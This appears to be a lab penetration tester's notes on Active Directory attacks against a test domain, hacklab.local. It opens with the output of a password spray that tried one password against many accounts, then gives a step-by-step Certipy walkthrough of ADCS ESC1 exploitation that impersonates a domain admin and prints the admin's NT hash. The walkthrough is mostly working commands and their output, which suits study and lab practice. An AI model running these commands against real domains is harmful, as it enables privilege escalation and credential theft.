a.taylor b.turner c.walsh d.ward e.webb f.west d.atkinson e.bailey f.baker g.ball h.bell i.brown j.burton k.carter l.clarke m.cole e.griffiths f.hall g.hamilton h.harris i.harvey j.hill k.jackson l.james k.yarrow l.yates m.young n.zachary o.zelly p.zinc q.zouch a.adams b.allen c.armstrong adm.adams adm.smith adm.stewart adm.natt adm.nelson svc_afds svc_test svc_mssql1 svc_mssql2 svc_lab svc_admin SR2000-1$ SR2000-2$ SR2000-3$ SR2000-4$ SR2000-5$ SR2000-6$ SR2003-1$ SR2003-2$ SR2003-3$ SR2003-4$ SR2003-5$ SR2003-6$ SR208-1$ SR208-2$ SR208-3$ SR208-4$ SR208-5$ SR208-6$ SR2012-1$ SR2012-2$ SR2012-3$ SR2012-4$ SR2019-1$ SR2019-2$ SR2019-3$ SR2019-4$ W7-1$ W7-2$ W7-3$ W7-4$ W7-5$ W7-6$ XP-1$ WIN-10-LAB$ WIN-10-LAB-2$ Tom_ADM kay1 -p 'Passw0rd!' -d hacklab.local -dc 192.168.68.230 488 | Accepted: Administrator 489 | Rejected: Guest 490 | Rejected: WIN-8HPLF8PSHC1$ 491 | Rejected: krbtgt 492 | Accepted: da1 493 | Accepted: n.collins 494 | Accepted: o.davidson 495 | Accepted: p.davies 496 | Accepted: q.dawson 497 | Accepted: u.dixon 498 | Accepted: r.edwards 499 | Accepted: s.elliot 500 | Accepted: t.evans 501 | Accepted: u.fisher 502 | Accepted: v.fletcher 503 | Accepted: w.ford 504 | Accepted: x.foster 505 | Accepted: y.fox 506 | Accepted: z.gibson 507 | Accepted: a.graham 508 | Accepted: b.grant 509 | Accepted: c.gray 510 | Accepted: d.green 511 | Rejected: b.smith 512 | Rejected: c.johnason 513 | Rejected: d.thomas 514 | Rejected: e.miller 515 | Rejected: f.johnsson 516 | Rejected: g.williams 517 | Rejected: t.harris 518 | Rejected: i.jackson 519 | Rejected: t.wilsson 520 | Rejected: k.mmoore 521 | Rejected: l.martsinez 522 | Rejected: m.marjtinez 523 | Rejected: n.anderson 524 | Rejected: o.thompson 525 | Rejected: p.thompson 526 | Rejected: q.lewis 527 | Rejected: r.robinson 528 | Rejected: s.sancshez 529 | Rejected: t.clark 530 | Rejected: u.hernandez 531 | Rejected: v.hill 532 | Rejected: w.king 533 | Rejected: x.rossi 534 | Rejected: y.darrdvis 535 | Rejected: z.perez 536 | Rejected: a.white 537 | Rejected: b.jackson 538 | Rejected: c.smith 539 | Rejected: d.taylor 540 | Rejected: e.martin 541 | Rejected: f.thoffmas 542 | Rejected: g.hernandez 543 | Rejected: h.rodrgviguez 544 | Rejected: i.johncson 545 | Rejected: j.miller 546 | Rejected: k.jones 547 | Rejected: l.davsris 548 | Rejected: m.andessrson 549 | Rejected: y.johnfson 550 | Rejected: o.mooore 551 | Rejected: p.clark 552 | Rejected: q.thomdas 553 | Rejected: r.martianez 554 | Rejected: s.wiloson 555 | Rejected: t.robinson 556 | Rejected: u.marteinez 557 | Rejected: v.sancahez 558 | Rejected: w.moorre 559 | Rejected: x.thompson 560 | Rejected: y.martsinez 561 | Rejected: z.hernandez 562 | Rejected: a.miller 563 | Rejected: b.rodriseguez 564 | Rejected: c.anderson 565 | Rejected: d.sancahez 566 | Rejected: e.wilison 567 | Rejected: f.davrtsis 568 | Rejected: g.mooree 569 | Rejected: h.thomddfas 570 | Rejected: z.johnsson 571 | Rejected: j.martainez 572 | Rejected: k.rodrigfduez 573 | Rejected: l.sanchdez 574 | Rejected: m.clark 575 | Rejected: n.davdemis 576 | Rejected: o.wilwson 577 | Rejected: p.robinson 578 | Rejected: q.hernandez 579 | Rejected: r.martiynez 580 | Rejected: s.anderson 581 | Rejected: t.johnsron 582 | Rejected: u.rodrigkjuez 583 | Rejected: v.sancghez 584 | Rejected: w.wilsaon 585 | Rejected: x.davifis 586 | Rejected: y.moossre 587 | Rejected: z.thomssas 588 | Rejected: a.martinuez 589 | Rejected: b.hernandez 590 | Rejected: c.robinson 591 | Rejected: d.clark 592 | Rejected: e.jodhnson 593 | Rejected: f.sanwchez 594 | Rejected: g.wilpson 595 | Rejected: h.davxris 596 | Rejected: i.moofrre 597 | Rejected: j.massrtainez 598 | Rejected: k.rodrijguez 599 | Rejected: l.sancahez 600 | Rejected: m.anderson 601 | Rejected: n.johnsson 602 | Rejected: o.martiwnez 603 | Rejected: p.hernandez 604 | Rejected: q.wiloson 605 | Rejected: r.davirws 606 | Rejected: s.moewore 607 | Rejected: t.thoweermas 608 | Rejected: u.johnslon 609 | Rejected: v.martienez 610 | Rejected: w.rodrisguez 611 | Rejected: x.sanchgez 612 | Rejected: y.wilison 613 | Rejected: z.davsdis 614 | Rejected: a.clark 615 | Rejected: b.johndson 616 | Rejected: c.martiwnez 617 | Rejected: d.rodrigruez 618 | Rejected: e.sanchjez 619 | Rejected: f.wilyson 620 | Rejected: g.davioos 621 | Rejected: h.mooeere 622 | Rejected: i.thomas 623 | Rejected: j.johnhson 624 | Rejected: k.martiunez 625 | Rejected: l.rodrigiuez 626 | Rejected: m.sanychez 627 | Rejected: n.wiwlson 628 | Rejected: o.daviuus 629 | Rejected: p.moorrre 630 | Rejected: q.thdddomas 631 | Rejected: r.johntson 632 | Rejected: s.marttinez 633 | Rejected: t.rodrieguez 634 | Rejected: u.sancrhez 635 | Rejected: v.wilsion 636 | Rejected: w.davccis 637 | Rejected: x.moowsxre 638 | Rejected: y.thomeeeas 639 | Rejected: z.johnqson 640 | Rejected: a.martwinez 641 | Rejected: b.rodrigutuez 642 | Rejected: c.sanczhez 643 | Rejected: d.wilsuion 644 | Rejected: e.daerfvis 645 | Rejected: f.mooure 646 | Rejected: g.thomeeeas 647 | Rejected: h.johnsson 648 | Rejected: i.martinwez 649 | Rejected: j.rodrwyiguez 650 | Rejected: k.sanchiez 651 | Rejected: l.wilyson 652 | Rejected: m.davssis 653 | Rejected: n.moorcre 654 | Rejected: o.thomderas 655 | Rejected: p.johnsson 656 | Rejected: q.maratinez 657 | Rejected: r.rodrieyguez 658 | Rejected: s.sancyhez 659 | Rejected: t.wilseon 660 | Rejected: u.daytvis 661 | Rejected: v.mocdore 662 | Rejected: w.thomattts 663 | Rejected: x.johnsaon 664 | Rejected: y.martihnez 665 | Rejected: z.rodrirtguez 666 | Rejected: a.sanchtez 667 | Rejected: b.wilswon 668 | Rejected: c.davyis 669 | Rejected: d.moodsre 670 | Rejected: e.thomfffas 671 | Rejected: f.johnso 672 | Rejected: g.martinjez 673 | Rejected: h.rodrigwuez 674 | Rejected: i.sancohez 675 | Rejected: j.wilesosn 676 | Rejected: k.dawerris 677 | Rejected: l.moouiyre 678 | Rejected: m.thogghmas 679 | Rejected: n.johseeson 680 | Rejected: o.martidnez 681 | Rejected: p.rodrasiguez 682 | Rejected: q.sanchpez 683 | Rejected: r.wilsson 684 | Rejected: s.daveeris 685 | Rejected: t.moodce 686 | Rejected: u.thomhhas 687 | Rejected: v.jhnson 688 | Rejected: w.martfinez 689 | Rejected: x.rodrifguez 690 | Rejected: y.sancuhez 691 | Rejected: z.wilsaon 692 | Rejected: a.davihhuus 693 | Rejected: b.mootfre 694 | Rejected: c.thomhhsas 695 | Rejected: d.johnsaon 696 | Rejected: e.martidfnez 697 | Rejected: f.rodridfguez 698 | Rejected: g.sancthez 699 | Rejected: h.wilzson 700 | Rejected: i.davffis 701 | Rejected: j.moodckre 702 | Rejected: k.thomeweas 703 | Accepted: l.johnon 704 | Rejected: m.martiynez 705 | Rejected: n.rodrsiguez 706 | Rejected: o.sanrchez 707 | Rejected: p.wiltson 708 | Rejected: q.davfwfis 709 | Rejected: r.mooyre 710 | Rejected: m.jenkins 711 | Rejected: n.johnson 712 | Rejected: o.jones 713 | Accepted: g.white 714 | Rejected: h.yalden 715 | Rejected: i.yarbury 716 | Rejected: j.yardley 717 | Rejected: z.mcdonald 718 | Rejected: a.murphy 719 | Rejected: b.natt 720 | Rejected: c.nelson 721 | Rejected: d.nightingale 722 | Rejected: e.nixon 723 | Rejected: f.nutter 724 | Rejected: p.kelly 725 | Rejected: q.kennedy 726 | Rejected: u.king 727 | Rejected: r.knight 728 | Rejected: s.lawrence 729 | Rejected: t.lee 730 | Rejected: u.lewis 731 | Rejected: v.lloyd 732 | Rejected: w.marshall 733 | Rejected: x.martin 734 | Rejected: y.mason 735 | Rejected: g.dell 736 | Rejected: h.osborne 737 | Rejected: i.owen 738 | Rejected: j.oxley 739 | Rejected: k.page 740 | Rejected: l.painter 741 | Rejected: m.palmer 742 | Rejected: n.pastor 743 | Rejected: o.peterson 744 | Rejected: p.quill 745 | Rejected: q.quimby 746 | Rejected: u.quintrell 747 | Rejected: r.ramsey 748 | Rejected: s.ratliff 749 | Rejected: t.richards 750 | Rejected: u.roberts 751 | Rejected: v.robinson 752 | Rejected: w.scott 753 | Rejected: x.simpson 754 | Rejected: y.smith 755 | Rejected: z.stewart 756 | Rejected: a.taylor 757 | Rejected: b.turner 758 | Rejected: c.walsh 759 | Rejected: d.ward 760 | Rejected: e.webb 761 | Rejected: f.west 762 | Rejected: d.atkinson 763 | Rejected: e.bailey 764 | Rejected: f.baker 765 | Rejected: g.ball 766 | Rejected: h.bell 767 | Rejected: i.brown 768 | Rejected: j.burton 769 | Rejected: k.carter 770 | Rejected: l.clarke 771 | Rejected: m.cole 772 | Rejected: e.griffiths 773 | Rejected: f.hall 774 | Rejected: g.hamilton 775 | Rejected: h.harris 776 | Rejected: i.harvey 777 | Rejected: j.hill 778 | Rejected: k.jackson 779 | Rejected: l.james 780 | Rejected: k.yarrow 781 | Rejected: l.yates 782 | Rejected: m.young 783 | Rejected: n.zachary 784 | Rejected: o.zelly 785 | Rejected: p.zinc 786 | Rejected: q.zouch 787 | Rejected: a.adams 788 | Accepted: b.allen 789 | Rejected: c.armstrong 790 | Rejected: adm.adams 791 | Rejected: adm.smith 792 | Rejected: adm.stewart 793 | Rejected: adm.natt 794 | Rejected: adm.nelson 795 | Rejected: svc_afds 796 | Rejected: svc_test 797 | Rejected: svc_mssql1 798 | Rejected: svc_mssql2 799 | Rejected: svc_lab 800 | Accepted: svc_admin 801 | Rejected: SR2000-1$ 802 | Rejected: SR2000-2$ 803 | Rejected: SR2000-3$ 804 | Rejected: SR2000-4$ 805 | Rejected: SR2000-5$ 806 | Rejected: SR2000-6$ 807 | Rejected: SR2003-1$ 808 | Rejected: SR2003-2$ 809 | Rejected: SR2003-3$ 810 | Rejected: SR2003-4$ 811 | Rejected: SR2003-5$ 812 | Rejected: SR2003-6$ 813 | Rejected: SR208-1$ 814 | Rejected: SR208-2$ 815 | Rejected: SR208-3$ 816 | Rejected: SR208-4$ 817 | Rejected: SR208-5$ 818 | Rejected: SR208-6$ 819 | Rejected: SR2012-1$ 820 | Rejected: SR2012-2$ 821 | Rejected: SR2012-3$ 822 | Rejected: SR2012-4$ 823 | Rejected: SR2019-1$ 824 | Rejected: SR2019-2$ 825 | Rejected: SR2019-3$ 826 | Rejected: SR2019-4$ 827 | Rejected: W7-1$ 828 | Rejected: W7-2$ 829 | Rejected: W7-3$ 830 | Rejected: W7-4$ 831 | Rejected: W7-5$ 832 | Rejected: W7-6$ 833 | Rejected: XP-1$ 834 | Rejected: WIN-10-LAB$ 835 | Rejected: WIN-10-LAB-2$ 836 | Rejected: Tom_ADM 837 | Accepted: kay1 838 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ 839 | ``` 840 | 841 | -------------------------------------------------------------------------------- /Active_Directory_Certificate_Service_ADCS.md: -------------------------------------------------------------------------------- 1 | **Some notes on Active Directory Certificate Services (ADCS) Exploitation** 2 | 3 | This is a good video https://youtu.be/wozcGjAsfZ0?si=1LJ4wjcHEblrV_4P which explains AD CS ESC1 Privilege Escalation exploitation, but also shows how to configure the vulnerable certificate and how to remediate them. 4 | 5 | **Using Certipy which is arguably the easier method.** 6 | 7 | **Install certipy in Ubuntu** 8 | 9 | Create a Python virtualenv which is an isolated Python environment, allowing you to install any tool and update it without the risk of impacting other python tools. 10 | 11 | ``` 12 | mkdir Tools 13 | sudo apt install python3.10-venv 14 | 15 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ python3 -m venv . 16 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ source bin/activate 17 | ``` 18 | 19 | To return to the normal environment, type deactivate 20 | 21 | ``` 22 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ deactivate 23 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ 24 | ``` 25 | 26 | To return back to the virtual environment 27 | 28 | ``` 29 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ sudo python3 -m venv . 30 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ source bin/activate 31 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ 32 | ``` 33 | 34 | Then install certipy-ad into your new isolated Python environment 35 | 36 | ``` 37 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ pip3 install certipy-ad 38 | ``` 39 | And install ldap3 40 | 41 | ``` 42 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ pip3 install git+https://github.com/ly4k/ldap3 43 | ``` 44 | 45 | **Locate AD CS ESC1 vulnerable certificates and exploit them** 46 | 47 | 1. Find the certs 48 | 49 | ``` 50 | certipy find -u g.white -p "Passw0rd!" -dc-ip 192.168.68.230 -scheme ldaps -ldap-channel-binding 51 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 52 | 53 | [*] Finding certificate templates 54 | [*] Found 35 certificate templates 55 | [*] Finding certificate authorities 56 | [*] Found 1 certificate authority 57 | [*] Found 13 enabled certificate templates 58 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA 59 | [!] Got error while trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. 60 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via RRP 61 | [!] Failed to connect to remote registry. Service should be starting now. Trying again... 62 | [*] Got CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' 63 | [*] Saved BloodHound data to '20240701104154_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k 64 | [*] Saved text output to '20240701104154_Certipy.txt' 65 | [*] Saved JSON output to '20240701104154_Certipy.json' 66 | ``` 67 | 68 | 2. Review the the cert output. 69 | 70 | ``` 71 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ gedit 20240701104154_Certipy.txt 72 | 73 | Certificate Authorities 74 | 0 75 | CA Name : hacklab-WIN-8HPLF8PSHC1-CA 76 | DNS Name : WIN-8HPLF8PSHC1.hacklab.local 77 | Certificate Subject : CN=hacklab-WIN-8HPLF8PSHC1-CA, DC=hacklab, DC=local 78 | Certificate Serial Number : 354DB064F33080BD4EB9FEAABE87DCF1 79 | Certificate Validity Start : 2024-04-23 13:56:37+00:00 80 | Certificate Validity End : 2029-04-23 14:06:33+00:00 81 | Web Enrollment : Disabled 82 | User Specified SAN : Disabled 83 | Request Disposition : Issue 84 | Enforce Encryption for Requests : Enabled 85 | Permissions 86 | Owner : HACKLAB.LOCAL\Administrators 87 | Access Rights 88 | ManageCertificates : HACKLAB.LOCAL\Administrators 89 | HACKLAB.LOCAL\Domain Admins 90 | HACKLAB.LOCAL\Enterprise Admins 91 | ManageCa : HACKLAB.LOCAL\Administrators 92 | HACKLAB.LOCAL\Domain Admins 93 | HACKLAB.LOCAL\Enterprise Admins 94 | Enroll : HACKLAB.LOCAL\Authenticated Users 95 | Certificate Templates 96 | 0 97 | Template Name : ESC3-Vuln2 98 | Display Name : ESC3-Vuln2 99 | Enabled : False 100 | Client Authentication : True 101 | Enrollment Agent : True 102 | Any Purpose : False 103 | Enrollee Supplies Subject : False 104 | Certificate Name Flag : SubjectRequireDirectoryPath 105 | SubjectRequireEmail 106 | SubjectAltRequireEmail 107 | SubjectAltRequireUpn 108 | Enrollment Flag : AutoEnrollment 109 | PublishToDs 110 | IncludeSymmetricAlgorithms 111 | Private Key Flag : 16777216 112 | 65536 113 | ExportableKey 114 | Extended Key Usage : Smart Card Logon 115 | Server Authentication 116 | KDC Authentication 117 | Secure Email 118 | Microsoft Trust List Signing 119 | Encrypting File System 120 | Client Authentication 121 | Certificate Request Agent 122 | Requires Manager Approval : False 123 | Requires Key Archival : False 124 | Authorized Signatures Required : 0 125 | Validity Period : 1 year 126 | Renewal Period : 6 weeks 127 | Minimum RSA Key Length : 2048 128 | Permissions 129 | Enrollment Permissions 130 | Enrollment Rights : HACKLAB.LOCAL\Domain Admins 131 | HACKLAB.LOCAL\Enterprise Admins 132 | Object Control Permissions 133 | Owner : HACKLAB.LOCAL\Administrator 134 | Full Control Principals : HACKLAB.LOCAL\Domain Users 135 | Write Owner Principals : HACKLAB.LOCAL\Domain Admins 136 | HACKLAB.LOCAL\Enterprise Admins 137 | HACKLAB.LOCAL\Administrator 138 | HACKLAB.LOCAL\Domain Users 139 | Write Dacl Principals : HACKLAB.LOCAL\Domain Admins 140 | HACKLAB.LOCAL\Enterprise Admins 141 | HACKLAB.LOCAL\Administrator 142 | HACKLAB.LOCAL\Domain Users 143 | Write Property Principals : HACKLAB.LOCAL\Domain Admins 144 | HACKLAB.LOCAL\Enterprise Admins 145 | HACKLAB.LOCAL\Administrator 146 | HACKLAB.LOCAL\Domain Users 147 | [!] Vulnerabilities 148 | ESC3 : 'HACKLAB.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 149 | ESC4 : 'HACKLAB.LOCAL\\Domain Users' has dangerous permissions 150 | 1 151 | Template Name : ESC1-Vun1 152 | Display Name : ESC1-Vun1 153 | Certificate Authorities : hacklab-WIN-8HPLF8PSHC1-CA - **Note you need this info**. 154 | Enabled : True - ** Note to exploit this needs to be enabled **. 155 | Client Authentication : True - ** Note to exploit this needs to be enabled **. 156 | Enrollment Agent : False 157 | Any Purpose : False 158 | Enrollee Supplies Subject : True - ** Note to exploit this needs to be enabled **. 159 | Certificate Name Flag : EnrolleeSuppliesSubject 160 | Enrollment Flag : PublishToDs 161 | Private Key Flag : 16777216 162 | 65536 163 | Extended Key Usage : Server Authentication 164 | Client Authentication 165 | Requires Manager Approval : False 166 | Requires Key Archival : False 167 | Authorized Signatures Required : 0 168 | Validity Period : 1 year 169 | Renewal Period : 6 weeks 170 | Minimum RSA Key Length : 2048 171 | Permissions 172 | Enrollment Permissions 173 | Enrollment Rights : HACKLAB.LOCAL\Domain Users - ** Note to exploit this Domain Users needs to be enabled or Domain Computers **. 174 | HACKLAB.LOCAL\Domain Admins 175 | HACKLAB.LOCAL\Domain Computers 176 | HACKLAB.LOCAL\Enterprise Admins 177 | HACKLAB.LOCAL\Authenticated Users 178 | Object Control Permissions 179 | Owner : HACKLAB.LOCAL\Administrator 180 | Write Owner Principals : HACKLAB.LOCAL\Domain Admins 181 | HACKLAB.LOCAL\Enterprise Admins 182 | HACKLAB.LOCAL\Administrator 183 | Write Dacl Principals : HACKLAB.LOCAL\Domain Admins 184 | HACKLAB.LOCAL\Enterprise Admins 185 | HACKLAB.LOCAL\Administrator 186 | Write Property Principals : HACKLAB.LOCAL\Domain Admins 187 | HACKLAB.LOCAL\Enterprise Admins 188 | HACKLAB.LOCAL\Administrator 189 | [!] Vulnerabilities 190 | ESC1 : 'HACKLAB.LOCAL\\Domain Users', 'HACKLAB.LOCAL\\Domain Computers' and 'HACKLAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication 191 | ``` 192 | 193 | The certipy tool will highlight certs that are vulnerable by appending [!] Vulnerabilities ESC1 at the end of the certificate. The following sections are required to exploit a cert. 194 | 195 | From the Certificate Authorities section, you need the CA Name and the DNS Name which in this example is the domain controllers host name. 196 | 197 | ``` 198 | 0 199 | CA Name : hacklab-WIN-8HPLF8PSHC1-CA 200 | DNS Name : WIN-8HPLF8PSHC1.hacklab.local 201 | ``` 202 | 203 | **Following this for a certificate to be vulnerable it requires the configuration to be set as defined below.** 204 | 205 | ``` 206 | Template Name : Add_Vulnerable_ Certs_Name 207 | Enabled : True 208 | Client Authentication : True 209 | Enrollee Supplies Subject : True 210 | 211 | Enrollment Rights : HACKLAB.LOCAL\Domain Users 212 | ``` 213 | 214 | 215 | 216 | 3. Create a TGT 217 | 218 | ``` 219 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ getTGT.py hacklab.local/g.white:'Passw0rd!' -dc-ip 192.168.68.230 220 | Impacket v0.11.0 - Copyright 2023 Fortra 221 | 222 | [*] Saving ticket in g.white.ccache 223 | ``` 224 | 225 | 4. Export the TGT 226 | 227 | ``` 228 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ export KRB5CCNAME=g.white.ccache 229 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ 230 | ``` 231 | 232 | 5. Verify you can ping the targets host name which in this circumstance was WIN-8HPLF8PSHC1.hacklab.local, if you can't ping it, add the host name to your Ubuntu /etc/hosts file. 233 | 234 | ``` 235 | sudo nano /etc/hosts 236 | 237 | 127.0.0.1 localhost 238 | 127.0.1.1 ubuntu-virtual-machine 239 | 240 | 192.168.68.230 WIN-8HPLF8PSHC1.hacklab.local 241 | 242 | 243 | ping WIN-8HPLF8PSHC1.hacklab.local 244 | PING WIN-8HPLF8PSHC1.hacklab.local (192.168.68.230) 56(84) bytes of data. 245 | 64 bytes from WIN-8HPLF8PSHC1.hacklab.local (192.168.68.230): icmp_seq=1 ttl=128 time=12.8 ms 246 | 64 bytes from WIN-8HPLF8PSHC1.hacklab.local (192.168.68.230): icmp_seq=2 ttl=128 time=1.15 ms 247 | ``` 248 | 249 | 250 | 6. Exploit the vuln certificate 251 | 252 | ``` 253 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'da1@hacklab.local' -debug 254 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 255 | 256 | [+] Domain retrieved from CCache: HACKLAB.LOCAL 257 | [+] Username retrieved from CCache: g.white 258 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230' 259 | [+] Generating RSA key 260 | [*] Requesting certificate via RPC 261 | [+] Using Kerberos Cache: g.white.ccache 262 | [+] Using TGT from cache 263 | [+] Username retrieved from CCache: g.white 264 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 265 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 266 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 267 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 268 | [*] Successfully requested certificate 269 | [*] Request ID is 7 270 | [*] Got certificate with UPN 'da1@hacklab.local' 271 | [*] Certificate has no object SID 272 | [*] Saved certificate and private key to 'da1.pfx' 273 | ``` 274 | 275 | 5. Extract a copy of the NTLM Hash 276 | 277 | ``` 278 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx da1.pfx -dc-ip 192.168.68.230 279 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 280 | 281 | [*] Using principal: da1@hacklab.local 282 | [*] Trying to get TGT... 283 | [*] Got TGT 284 | [*] Saved credential cache to 'da1.ccache' 285 | [*] Trying to retrieve NT hash for 'da1' 286 | [*] Got hash for 'da1@hacklab.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 287 | ``` 288 | 289 | 290 | 291 | 292 | 293 | **Common errors and how to fix them** 294 | 295 | 1. CRYPT_E_REVOCATION_OFFLINE - The revocation function was unable to check revocation because the revocation server was offline. 296 | 297 | Two fixes for this error, the first approach is to reboot the DC, the second approach is listed below. 298 | 299 | ``` 300 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'da1@hacklab.local' -debug 301 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 302 | 303 | [+] Domain retrieved from CCache: HACKLAB.LOCAL 304 | [+] Username retrieved from CCache: g.white 305 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230' 306 | [+] Generating RSA key 307 | [*] Requesting certificate via RPC 308 | [+] Using Kerberos Cache: g.white.ccache 309 | [+] Using TGT from cache 310 | [+] Username retrieved from CCache: g.white 311 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 312 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 313 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 314 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 315 | [-] Got error while trying to request certificate: code: 0x80092013 - CRYPT_E_REVOCATION_OFFLINE - The revocation function was unable to check revocation because the revocation server was offline. 316 | [*] Request ID is 6 317 | Would you like to save the private key? (y/N) 318 | [-] Failed to request certificate 319 | ``` 320 | 321 | Fix - https://stealthpuppy.com/resolving-issues-starting-ca-offline-crl/ 322 | 323 | Open admin CMD on your DC and execute 324 | 325 | ``` 326 | certutil –setreg ca\CRLFlags +CRLF_REVCHECK_IGNORE_OFFLINE 327 | ``` 328 | 329 | 330 | ``` 331 | C:\Users\Administrator>certutil -setreg ca\CRLFlags +CRLF_REVCHECK_IGNORE_OFFLINE 332 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\hacklab-WIN-8HPLF8PSHC1-CA\CRLFlags: 333 | 334 | Old Value: 335 | CRLFlags REG_DWORD = 2 336 | CRLF_DELETE_EXPIRED_CRLS -- 2 337 | 338 | New Value: 339 | CRLFlags REG_DWORD = a (10) 340 | CRLF_DELETE_EXPIRED_CRLS -- 2 341 | CRLF_REVCHECK_IGNORE_OFFLINE -- 8 342 | CertUtil: -setreg command completed successfully. 343 | The CertSvc service may need to be restarted for changes to take effect. 344 | ``` 345 | 346 | 347 | 2. TGT: Kerberos SessionError: KDC_ERR_KEY_EXPIRED(Password has expired; change password to reset) 348 | 349 | Meaning - The DA accounts password has not been configured to never expire, it has expired requiring it to be changed before an NTLM hash can be harvested. 350 | 351 | ``` 352 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'svc_admin@hacklab.local' -debug 353 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 354 | 355 | [+] Domain retrieved from CCache: HACKLAB.LOCAL 356 | [+] Username retrieved from CCache: g.white 357 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230' 358 | [+] Generating RSA key 359 | [*] Requesting certificate via RPC 360 | [+] Using Kerberos Cache: g.white.ccache 361 | [+] Using TGT from cache 362 | [+] Username retrieved from CCache: g.white 363 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 364 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 365 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 366 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 367 | [*] Successfully requested certificate 368 | [*] Request ID is 8 369 | [*] Got certificate with UPN 'svc_admin@hacklab.local' 370 | [*] Certificate has no object SID 371 | [*] Saved certificate and private key to 'svc_admin.pfx' 372 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx svc_admin.pfx -dc-ip 192.168.68.230 373 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 374 | 375 | [*] Using principal: svc_admin@hacklab.local 376 | [*] Trying to get TGT... 377 | [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_KEY_EXPIRED(Password has expired; change password to reset) 378 | ``` 379 | 380 | Reset the password on the DC for that account and it will then work. 381 | 382 | ``` 383 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'svc_admin@hacklab.local' -debug 384 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 385 | 386 | [+] Domain retrieved from CCache: HACKLAB.LOCAL 387 | [+] Username retrieved from CCache: g.white 388 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230' 389 | [+] Generating RSA key 390 | [*] Requesting certificate via RPC 391 | [+] Using Kerberos Cache: g.white.ccache 392 | [+] Using TGT from cache 393 | [+] Username retrieved from CCache: g.white 394 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 395 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 396 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 397 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 398 | [*] Successfully requested certificate 399 | [*] Request ID is 9 400 | [*] Got certificate with UPN 'svc_admin@hacklab.local' 401 | [*] Certificate has no object SID 402 | [*] Saved certificate and private key to 'svc_admin.pfx' 403 | (Tools) 